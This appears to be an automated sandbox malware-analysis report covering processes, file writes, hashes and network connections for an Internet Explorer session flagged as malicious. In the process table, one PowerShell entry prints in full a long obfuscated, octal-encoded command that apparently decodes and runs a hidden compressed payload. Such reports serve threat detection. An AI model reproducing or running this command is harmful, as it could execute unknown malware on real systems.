URL: | https://www.google.com |
Full analysis: | https://app.any.run/tasks/474e560c-c2c0-4627-a583-9d4c04840378 |
Verdict: | Malicious activity |
Analysis date: | July 17, 2019, 02:04:56 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MD5: | 8FFDEFBDEC956B595D257F0AAEEFD623 |
SHA1: | EF7EFC9839C3EE036F023E9635BC3B056D6EE2DB |
SHA256: | AC6BB669E40E44A8D9F8F0C94DFC63734049DCF6219AAC77F02EDF94B9162C09 |
SSDEEP: | 3:N8DSLIK:2OLIK |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3532 | "C:\Program Files\Internet Explorer\iexplore.exe" "https://www.google.com" | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 1 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3964 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3532 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
4028 | "C:\Windows\system32\cmd.exe" | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3276 | "C:\Windows\system32\notepad.exe" | C:\Windows\system32\notepad.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3332 | powershell "[sTRING]::joIn( '' ,( '44G124G153%75:147p145G164,55p143,157K165S156D164G145K162~73G50K40%120%160S40<40:111<157,56S123D124S162K145:141:115D162D145,141p104p145K162S50K50:40<120p160K40:151%117,56<143G117G115S160,122D145:123%123%151<157<116D56p104,145G106K114D101S124,105K163~164K122K145S101S115S50,40~133:123<131~163:124G145p115%56K151<117:56,115<105~115D157p122S131G163%124K122~145~101p115G135G40:133p143,117~156p166<105~122K164S135<72:72K106S162%157K155:142~101D163<105%66S64~163K164<122:151~156,107S50~47,146%126p132p164S142D71S160%111~105<120p64<162~154<150~126D154K142,121S113,107<105G116D112p145p121~126%107,120S105K112:146D123S105~106p111D102,157p122G146K122S161S107~166<115K121,161S167G131%155,170D160:104<155:156D120G62,166<71K57p115p162,101S61%62D143p63,143%146<70~101D166K145p155G132<63p156K145:145%132D154K166:131S126%150S127,101S142K67%141D70<110%115S126G70G166S121D153D65,160<115G66K152S111:65:154~142D160,127<127p142,102G167S107,61D144G131,155~125%126D145K163G111,124G142K112~155:141D155~161:126K126K70,67K60~154<157D141S151%125<163K161D171~167:60G126K154K157,107,70S114D153S105<130p65p117%152D160:115G143p71G145,121~107p146p124,62p130G123:111%106D71<156D115~156<153,156K153D57<143,123G104~143<66%126%167K142%167~161<162<104<127K131,120<115K142p170<145p147:120%63S131:102p67S66G62p170,146%143D103p130:67K116:141G156<127:170:170D131p53:64%167%157<114D146p131p150D163G167S163S63S127<125<145p114D167~156<114p63,123%64K145%57p113~152D146%155D111p143D161K66S151%61~171~161G143,167~127S152p155,170K132~162%101:121p111K147<101~163:155,53G62S115K156<125D103S60G105,126~167~170,143S164K120D161G102S142D166K167G123%122S151K61<143K166K60G71G117,162S114G57G172<151K113,163<131~61:121p125<153:151p145G103:107D120K131<141S151<116,152~66D112<155:131~144G145<120p122:150,125,71G152~141S152G142<60,167G60:111%132~70G116~104S145p155<64K102<115D143,120~155D150D110~123p143p171,106%114G122G106:165D130G62%157p130,62D160D53<112S142,107D156%64K142K114D105,127D147p63D143~62~132,164K156K67%104:63G161:146~60:114~163p120~67K170K126K66K142D70D115:67%150%103%60S143<71G71S107<101,145p113~124,155<102<145K161G67:146S151<63,64D57K125G132D110K172G62:115~165K102,104S160~120~156,167G104p131:105S101D103G112,164%145D53<64~145K104:57K101G117~153%161G105K114:103D164:172D146,104K122D154:112:117,112<164~106~112%103p150p142<125S166S132<101S164%120p122~102<112p150,123S155p107:164S113<62S172G165G101S62S104G151p104~146K60~107G171G156D160%124%103S63K64G150G105,57~120:114:151,63K110S114<127K53:105G172D146G147~141K57~127,143:125p110p170,165G125<144K151,155G131:143S70p121<112D146p103K152K126~125K145%65G106D167D70:162%57S102D62K152S104%156,127S67%123%155<104D122<163K157:67D102,156~116:107D154~150~157,124<172:123%161<131S62,161:127~121S126~110~102,155D120p154K170p106:103%123~64:124p112<57p112G121~126p156,63p110,62<57%60:67K157,126G165%107,147%143~160~156%166p163,64S117:166D151G101:167,150:166p141~103~131:151~147:172S104%67K171~101G127G61K163<65K111:122p53<124:144p160,57p146D62~146D162D162G110G147K167,131~105<65%64S142G116S106:162p102G142p171D132~167<65:146S124,144,147<66G125<120K62<156p167p154~144,105<171S157:162G157:147S67p113<53<102D70G67,147D165~64S170G147S146K155~70D65p106,153G57~150S103:145K121D153,130K142%160S156%106G121D130~155~145p131K106p115K172:57:102S154:127K124<113S141S66<125%142p145%124%101%167~124%113,112S171G132D170p121K154%125<113%115,144%165S71S153G103D66S151G163:147,150p147p63K131K152,125~124p123S151D127,106<112K53<104~164D107:170~166K170%107D110<153,170G141D154G155G116S156:161S132K113,105p117K106p154G126S161,125,147D141:142~70%163~146<153D127K150G101~170%123,53:151K146%147~70K102p65S66K151p112S172~107<157<144~124~147:172D161%161,125%171:171<71<172<164G116~126,110%102S164K57:156:142p64K104D127%113%110,164K143~145~157K156D146K64K103K161S120G130D166%64G65S64D145p115G155G57p62G112G62G170~142%165D153,63D131%163,167G146p142~66~71~107%141G115K70%53p115p152p115:170D152,166S144K112~152K155p66D107:64G117~117,113%131D152~124S171S153K161S146K151~145D107D155G145D116,141S70p142p120,53%110~53%101D57G141%161<122K106%102%147S67~131%66G164~141~131K172S53D156:114~161~120S67%145p152<150p121p61p61D154%104<57D145,63:101<106K60D120K62%150<147G114%116:143S112<151G61G103p130~163K147D57G115K123:61<113<141K105G71<121K115D147G110~102,116D111K71S167,132S70~167K163G115D156G127<172:143G113G122G124~122K101D116G161p102:153D172,120K112~160:107p127p164~61S165%111G130K151:116S121S153D102D141p141~71G101G132<120G123p124S113<153K150,141<127p160p143<131D153,115,157p145K105K64p157S172p113S67S146:165%126<157:105p61D146D165S117p172:151%170K63%116<53p170,57:112:123p141<142p156p126~141:161K126%125S107,114,166:110D111,64p142%166~117%65:112p172D143G152p104:144G126<121p172p161G154<65D147%147K127G114~146<113:162<123G131%110:164~107:146<163~130%57~64K166p171:132,57D160~112p126,116G112<132S162:147~127D111~110p57:160:65G61<110p132S65,150K171D166S130K116S70D123%152~116K71~64G107K101p126K132%154p172:166K123D130,153p117G123p153K166D126~141<65p102G160G112G121~151K62<71%152K65~57S147,144:66S145D124D167%113:107%166~103:60%67p165~146D141,156,151%152:67S152:116%143G63p63D112D152:131S161K171G163%143~163%166:167~164S131G116~116S142<102~126%144<61G143p113<164K125G114:104%127<170<103S162<115<110~57S130%141%171~131<114:114:127D62,113K124S122<164%66K156G67~145~65~71p106p117%154p122<101G70p71,123K101~170,142~161S53%106%156%160,145:114<61<101S114S124%124S154S160G141<53p61G123S147p104:164K165p163,116~163%67D165~60S162D162K171K104:61K125<60G121<142,161<121:101~121G57D107%117S125%171G156,141%64K153<106G70:141K155<120~64,57K106,162:106<113D65K106p106:114<71<101%144<160,124~123p111:126~57%167~127%122G156,106G66K131D104K110D61G156~164p114p111D126p144~165S156G116,150~71%114G110D132,63S170~114G71%170:121:62S62:150K65~156,171%130D164S53D125S106,172S111<131:101%143:162D163D132G151:71G126~141K101,166S63G114%112p142K102:57K154p106S172p150S63%115G160D104<131%165~152%145,71:127:151p141K157:107,110%127G147S145K165K110D112D106:171:161p143,167D102~155S154K157K147~162D153%143:111~61G157D112K66p154,125,126~125,66~162:164G102p60<103:172p162%115G153%121K64:67~146p142K166~110~63G132<146,147<66%64D122,71%132%171:145%60D71K121~153:143,106<61p161K57,160:62<161:153~62D147~152<60<156~62G150,141p145<172<151K143G143S166G141~144%121:107<115G142p172%111:117%64,64,166p162K145K145,150G132D151G157<64K63K155<115%115p117p155p130~155:147S164K120,106G70G70,116p112p166D66K115G170p71G66~110:115S141,167K64D57<165G130%71p62G117K170p60G121p110,153~115K66G122D141%145~144:157~112p147p170G62:167K103:64,165p101D142K65G147S117:125D131:151K124S64~164D114S102K105%64p150:64<61<170D152%150G167p111G147%113S160~170%103p152,117~105G161%110G145p101G103:103<57<143%103:152~57<171D114D160K101~102K120p71<171%65,102%156%107G151,167p104,124:153G170:112S107G150:70:130~103G157D160p123D63~103p126%62,156G57:153S71G126%153~124G146K65,147,120,145:110K130G53~107G172~63~66:163G61%127~163:61<115,170%63<165S170p167S126D116,116p172S122K117%170~102p160D115,120,53,104p121S57:166,113:172:155%110K122%160p112p70,145:124%155p107p53~65S143p117<60D106S115p101S166G130D66%156<122%125<126G152%107,143S60~70:112G107<144,164:102~114,112,66K157S124G63K145G103S102S162:157<116K112D151%162%163G70<142:123D67,150<117<157S64p143G71%111S112,70:166%60~102G145~165D155K111D104%53p57:63p170K165:164S53~132~126%124p143K113:102K126K103%142S162p61D146K60~63~126%103G117<170p122S114G122,130:166%156~53<153K111,66G153D112K117K62K111:162G152,166<163~122p123G60:162<130K57:165p105<104G121<115p167p164:146:116,172K142p112S115<142p57p66:62<171p166K144,151:107G157,166~146:67:125%111D63~62<66G113K102G163<112S112D142G151<106D53G155%113D145S157%101%141<153D111%104G65G121S170%145<157G126:127K142K146K65,63D122~111S116<143p61S57S101:101K75%75D47G51D54:133:111:117<56p143,157%155S120K122~105D163p123,151<157:116K56D143:117~155S120<162,145~163:123<151p117,156K155~117p144K105,135S72p72D144%105p143~117p115%160S162:145%163~163:51S51<54%40G133~124p145%170K164<56~145D116p143<157:104p151,116,107p135:72S72p141%123<143:151:111S51:40:51<56p162%145:101%104~124p117K105,116K104,50G40%51S174~120G160<160'-SPLiT','-sPliT'G' -split'D'-SpLiT'%' -SpliT '<'-sPlit 'S' -split'p' -SpliT'~' -sPlIt'K' -SPliT':' |%{ ( [ConvERT]::toiNT16(( $_.TosTRiNG()) ,8)-as [CHaR])}) )" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3532 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
3532 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
3964 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@google[2].txt | — | |
MD5:— | SHA256:— | |||
3964 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\SC4TYKXE\google_com[1].txt | — | |
MD5:— | SHA256:— | |||
3532 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF2CB4A0D2E635DAA4.TMP | — | |
MD5:— | SHA256:— | |||
3964 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@google[1].txt | text | |
MD5:2C6A2153A702D0D9EF708E683F00AC2B | SHA256:08E3917BA5BDBBABFF286BF23B0B0D3561CE00D7B5ACF06D0ECF258C9A6461C6 | |||
3532 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF79CD5BB1BA16C293.TMP | — | |
MD5:— | SHA256:— | |||
3964 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat | dat | |
MD5:D47ABEB13D96D4CBB1AEE9D993F41DB5 | SHA256:1B07282E9B5E0CF6837C4812A87A87DA196E44AAC21BA7DC08210B25A09ED38C | |||
3964 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\index.dat | dat | |
MD5:2183561AF5C0D31DE463804D59CBD190 | SHA256:8B289F305BCB89B441BDE9FFAC5033FE8DB71A85302187944F110145DBAEDF02 | |||
3964 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\LLJ0WZ3G\rs=ACT90oG2W-B0YVS9JDpKMf972pB-6du_HA[1] | text | |
MD5:203B100FBE1C51A960E2804DA0B01D36 | SHA256:DE22A17DA12FCB0F9021794AB56F578657911D44ACAD2E8E4AC3061B24C5F6D5 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3532 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3964 | iexplore.exe | 172.217.18.100:443 | www.google.com | Google Inc. | US | whitelisted |
3532 | iexplore.exe | 172.217.18.100:443 | www.google.com | Google Inc. | US | whitelisted |
3532 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
www.google.com |
| whitelisted |
www.bing.com |
| whitelisted |